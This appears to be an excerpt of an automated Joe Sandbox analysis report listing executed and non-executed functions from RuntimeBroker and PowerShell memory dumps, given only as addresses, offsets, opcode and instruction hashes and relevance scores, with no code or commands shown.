                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a67941b112c9d8a6a0c7bada7299a4b15c93517f6fcda5a20f751049ebdf6e08
                                                                                                                                      • Instruction ID: 7721ac2f4d3a4d118fecbb5ab40e35074b78e0961862e4c29a003a268da86cdb
                                                                                                                                      • Opcode Fuzzy Hash: a67941b112c9d8a6a0c7bada7299a4b15c93517f6fcda5a20f751049ebdf6e08
                                                                                                                                      • Instruction Fuzzy Hash: D7F0EC70E0550E8BEB14DF84C4647FC77B1AB5C319F15413AC015A62E4CB79A988CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D0115 Relevance: .0, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 394cc23d32773e729b1488561120bd534591fc6c0af0e48a9fa065b4cec9f660
                                                                                                                                      • Instruction ID: d8cdbc9fa8ab1dd57462dd35c568cd550ea0f0b09558d317de7ffdb5c814b746
                                                                                                                                      • Opcode Fuzzy Hash: 394cc23d32773e729b1488561120bd534591fc6c0af0e48a9fa065b4cec9f660
                                                                                                                                      • Instruction Fuzzy Hash: 1EE0923195E38D8FDB269F7088665D93FA0FF45304F0606BAD458461E6EA68AA24C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CA1DD Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c76cd19877da2514bb35b312c4e262fec0f6c52acd9a6cd371b07bc3308deb5
                                                                                                                                      • Instruction ID: 16c3ed72f3c4d39044c099b7ed734c8d44601ef8a3dfe3f04e9aba38f69960f5
                                                                                                                                      • Opcode Fuzzy Hash: 0c76cd19877da2514bb35b312c4e262fec0f6c52acd9a6cd371b07bc3308deb5
                                                                                                                                      • Instruction Fuzzy Hash: 9CF0A07091A28D9FDB51EF608A206ED77B0FF05300F4504E6E028C32A2DB389618D741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89E2AA Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction ID: abf02cccf1b7f8c885843eab26038be62658b2b2a60f9951619bf0f29e0ff77e
                                                                                                                                      • Opcode Fuzzy Hash: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction Fuzzy Hash: 87F0DA30E4915E8EFFB09BE484583ACBFB0AF1C302F22407AE40DD65A5DA3866848F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B882171 Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b880000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4041e85526d2930f93c8c8233e994ef650e375e6b0e5885d5af537e3e6a5fde3
                                                                                                                                      • Instruction ID: 122348588e04349c4afce3a19175923a1dd219546ab526eb643bbac7085b5b6e
                                                                                                                                      • Opcode Fuzzy Hash: 4041e85526d2930f93c8c8233e994ef650e375e6b0e5885d5af537e3e6a5fde3
                                                                                                                                      • Instruction Fuzzy Hash: B3F0FE74E1991E8BE7E8EF18CCA46E877B1EF98344F0041F5901D935A5CE346E818F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF57D Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 20e5452e687398c73ec7f55104fab3c5abd0a807c4d2be0cd231741927c83c3b
                                                                                                                                      • Instruction ID: e16c22af409e5cc973139c2ff14ea78296fa7b9d0aec0a50bc0613ad4b0273b3
                                                                                                                                      • Opcode Fuzzy Hash: 20e5452e687398c73ec7f55104fab3c5abd0a807c4d2be0cd231741927c83c3b
                                                                                                                                      • Instruction Fuzzy Hash: 06F0DA70A0450D8FE714DF84C4647F877B1EB58329F14413AC415A72E5DB79A9848B14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C9C9D Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c52a3d9b8baefb7cdc3526652f2e019c769c2bef7236151d7ee31d0395fe804d
                                                                                                                                      • Instruction ID: 0951ee951e038e8f671f6c1768425f9f16bcd8fe4629ae3840579e232786afff
                                                                                                                                      • Opcode Fuzzy Hash: c52a3d9b8baefb7cdc3526652f2e019c769c2bef7236151d7ee31d0395fe804d
                                                                                                                                      • Instruction Fuzzy Hash: 72F0D470A0411D8BEB56EB80C8587E9B3A2FB99320F10067AC409A72D1DB7966848B44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88A1E2 Relevance: .0, Instructions: 22COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b886000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction ID: 2a9cce8ef03432b02c27bed38e24ea2f9db93362f2a2681169a626367e4c1cc5
                                                                                                                                      • Opcode Fuzzy Hash: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction Fuzzy Hash: B0F0D470D0A62D8FFBB4AB64C968BE9B6B0EF58300F1100F8C15DA2391DE395AC4CE01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89D94E Relevance: .0, Instructions: 18COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 494b4b09c0910be5f2deb8fc44d2daa3adb0486e84b4653d8813cd6dc5645162
                                                                                                                                      • Instruction ID: 524775755e8bcc12cb126dcbb89bb6951200bbf4187f4c50db44a891ae933f13
                                                                                                                                      • Opcode Fuzzy Hash: 494b4b09c0910be5f2deb8fc44d2daa3adb0486e84b4653d8813cd6dc5645162
                                                                                                                                      • Instruction Fuzzy Hash: 87E04F61A0461A8BEB589F48C8915AD7FB1EF44200F400135C41D871D5DE342542C740
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 00007FFD9B894E90 Relevance: 5.1, Strings: 4, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %$($)$+
                                                                                                                                      • API String ID: 0-687716160
                                                                                                                                      • Opcode ID: 951e6e74a341abd72bba46a29dece6e0e0652021633df95f2e38f2a5eb425ace
                                                                                                                                      • Instruction ID: e8f7a8636b4bd24637bff69abf59f12d483bff6b92003487f846a2a6bb2f06c9
                                                                                                                                      • Opcode Fuzzy Hash: 951e6e74a341abd72bba46a29dece6e0e0652021633df95f2e38f2a5eb425ace
                                                                                                                                      • Instruction Fuzzy Hash: CE21F330E06A2D8FEBB9DF54C8947E9BBB5EB49301F1041E9C00DA2291DB746B888F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00007FFD9B88604D Relevance: 1.2, Instructions: 1242COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 09c7c5660afbfecfca8a0fd3eff6831a8a5ae9b4cbfc362afd7fbaaefa930b6f
                                                                                                                                      • Instruction ID: 6ad72c80a4a2df7a6827b977729448c944d757672b43b77f6847a945f67fb68c
                                                                                                                                      • Opcode Fuzzy Hash: 09c7c5660afbfecfca8a0fd3eff6831a8a5ae9b4cbfc362afd7fbaaefa930b6f
                                                                                                                                      • Instruction Fuzzy Hash: E0428E72F0DA6A8FD765EB9CE8A59E97BA0EF54325B0501B7C09CC7193DD34A84683C0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88BD99 Relevance: .5, Instructions: 498COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cba7e12f362b6fa2886cd1a70f75ff4b7086e60a6a9e3a3972cf0208f25d4ea6
                                                                                                                                      • Instruction ID: d728169a623b83bdc0f829ef92f33998ac8e485ec1f78e97a0428d5e13f0ccf6
                                                                                                                                      • Opcode Fuzzy Hash: cba7e12f362b6fa2886cd1a70f75ff4b7086e60a6a9e3a3972cf0208f25d4ea6
                                                                                                                                      • Instruction Fuzzy Hash: 54F1B230A08A4D8FDF98EF5CC495EA977E1FFA8300F15416AD41DD7296DA35E882CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B889718 Relevance: .2, Instructions: 162COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a9866f3770327c49cb62b7a020195a639c763b4d0a1769518dcbae3dbff502cc
                                                                                                                                      • Instruction ID: db55534d9617d12774fd4637870938ef1e8faafd1bf9a51e282cd07a4f0f6593
                                                                                                                                      • Opcode Fuzzy Hash: a9866f3770327c49cb62b7a020195a639c763b4d0a1769518dcbae3dbff502cc
                                                                                                                                      • Instruction Fuzzy Hash: 57412B71A0EE888FDB199F5C9C596A87FE0FF55310F0441AFD49983193DA30A956C7C2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B76EE24 Relevance: .1, Instructions: 123COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3297182982.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b76d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d21903c644ff3494e61449fc820faad7bb702aa4f675679e1085348cb84c0a63
                                                                                                                                      • Instruction ID: 39facd1971418094193a054b8591cb5f3c73a8d726000450009243f2d0e53973
                                                                                                                                      • Opcode Fuzzy Hash: d21903c644ff3494e61449fc820faad7bb702aa4f675679e1085348cb84c0a63
                                                                                                                                      • Instruction Fuzzy Hash: A841197150EBC45FE7669B3898519523FF0EF52320B1606DFD088CB5B3D625A845C7A3
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88A49C Relevance: .1, Instructions: 100COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 80e1554062fff891b96d5c09d214738a8a7b914e033b92d1169a1d0cb1c86df9
                                                                                                                                      • Instruction ID: 6b30c4d037d6215c66773289ba282eb38df01be1563d8a5be7f1016cb9e5632c
                                                                                                                                      • Opcode Fuzzy Hash: 80e1554062fff891b96d5c09d214738a8a7b914e033b92d1169a1d0cb1c86df9
                                                                                                                                      • Instruction Fuzzy Hash: D021373190CB4C4FDB59DFAC984A7E97FE0EB96320F04416BD448C3166DA74A81ACB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                      • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                      • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88BE88 Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 70744461ae5ccc717cd413a90b27d3fe3270dfe4984880f8163348218504d8b2
                                                                                                                                      • Instruction ID: f549b9050bd2d094f6d424cfcc68510edbfe49707a53a5e7696cd76faf6c8ab8
                                                                                                                                      • Opcode Fuzzy Hash: 70744461ae5ccc717cd413a90b27d3fe3270dfe4984880f8163348218504d8b2
                                                                                                                                      • Instruction Fuzzy Hash: 4AF0303275CA088FDB5CAA1CF8529B573D1EB99330B10016EE48BC3696E927E8428685
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B889CF8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 225d534b10ffa96b5f6359070a9d0e006bf857a65ebfb589d90f9e322fa7fec6
                                                                                                                                      • Instruction ID: fe4b42ce1718875437b32093cd74c164c03aefd7c0e109ff27d8a41de0f6f770
                                                                                                                                      • Opcode Fuzzy Hash: 225d534b10ffa96b5f6359070a9d0e006bf857a65ebfb589d90f9e322fa7fec6
                                                                                                                                      • Instruction Fuzzy Hash: 09F0B431808A8D4FDB56EF6888695D5BFA0EF16311B0502DBE458C70B2DB759558CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 00007FFD9B8884E3 Relevance: 6.4, Strings: 5, Instructions: 116COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                      • API String ID: 0-2528851458
                                                                                                                                      • Opcode ID: c246f5b10b1fb4dfbbc3f7246b433dbdd6090e5cff2b7d3f33dd8a073cea2d4a
                                                                                                                                      • Instruction ID: d4ea238b183a4c5fe4524344354017a572c74594501292c34f71046ec32452b4
                                                                                                                                      • Opcode Fuzzy Hash: c246f5b10b1fb4dfbbc3f7246b433dbdd6090e5cff2b7d3f33dd8a073cea2d4a
                                                                                                                                      • Instruction Fuzzy Hash: C4314F93E0FAD61BE763477958750942FA0EE5B66470E02E7C0E94F0A3FA1469478342
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00007FFD9B899708 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: wYC
                                                                                                                                      • API String ID: 0-1816533500
                                                                                                                                      • Opcode ID: 34903005e38445be1c3caca7286aa3338e99f51e4f9e71a204e3048d3715c2f7
                                                                                                                                      • Instruction ID: afe0accac22646efe4ca6818580b6790547a0f3110cd51d43df0aa499a7f1deb
                                                                                                                                      • Opcode Fuzzy Hash: 34903005e38445be1c3caca7286aa3338e99f51e4f9e71a204e3048d3715c2f7
                                                                                                                                      • Instruction Fuzzy Hash: 0C513A71A0DB889FDB199F5C9C1A6A87FE0FF55310F4441AFE09983293DE20A955CBC2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89604D Relevance: .4, Instructions: 387COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4cf06d134e2fe43205c4452748289c32250545fe760480720480c3e2b7ce52cb
                                                                                                                                      • Instruction ID: 04f11eb7c8b594ce30fe933000579b1f82376ce2d19706121f7b52a5f125ba93
                                                                                                                                      • Opcode Fuzzy Hash: 4cf06d134e2fe43205c4452748289c32250545fe760480720480c3e2b7ce52cb
                                                                                                                                      • Instruction Fuzzy Hash: AA11916260E7CA8FDB178B6498745A53FB0AF17240B0A01E7D489CB0B3D618A94CC792
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B77EE24 Relevance: .1, Instructions: 125COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3296879909.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b77d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 66ea38963ab7c5d1f15c78f5fd381abf99a5e5887f5a979c5872ca10f02852ef
                                                                                                                                      • Instruction ID: 3b3fa05bd03b3490c2885537e05eabec27d7bd638240bf1ca9dde5941f2bac11
                                                                                                                                      • Opcode Fuzzy Hash: 66ea38963ab7c5d1f15c78f5fd381abf99a5e5887f5a979c5872ca10f02852ef
                                                                                                                                      • Instruction Fuzzy Hash: C741277140EBC84FE7568B3898559523FF0EF53320B1A06DFD088CB1B3D665A846C792
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89A4AC Relevance: .1, Instructions: 100COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 83bad9add4b0d116aa346ab125164a64a813529653bf6c75d3bc39e29e0756d4
                                                                                                                                      • Instruction ID: 910f361a8f97dce0a81a3bd72a369cc2fc5ffe49fbf78b4a08458b96b4aff024
                                                                                                                                      • Opcode Fuzzy Hash: 83bad9add4b0d116aa346ab125164a64a813529653bf6c75d3bc39e29e0756d4
                                                                                                                                      • Instruction Fuzzy Hash: 3A21073190CB4C8FDB59DFAC984A7E97FF0EB96321F04426BD048C3166DA74941ACB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                      • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                      • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B899CF8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1b3ea643f17a63e63a1b7d5800bf695a9227f7625860bda10ae9635cfdad58f6
                                                                                                                                      • Instruction ID: 4f17bb1a1fc7e19c9ad0d3c861df80490d520998a0ea6bc7f24a8f51d51e1657
                                                                                                                                      • Opcode Fuzzy Hash: 1b3ea643f17a63e63a1b7d5800bf695a9227f7625860bda10ae9635cfdad58f6
                                                                                                                                      • Instruction Fuzzy Hash: 80F02431808A8D4FEB1AEF2888694D57FA0EF16310B0502DBE448C71B2DB64A598CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 00007FFD9B8984F2 Relevance: 11.5, Strings: 9, Instructions: 290COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
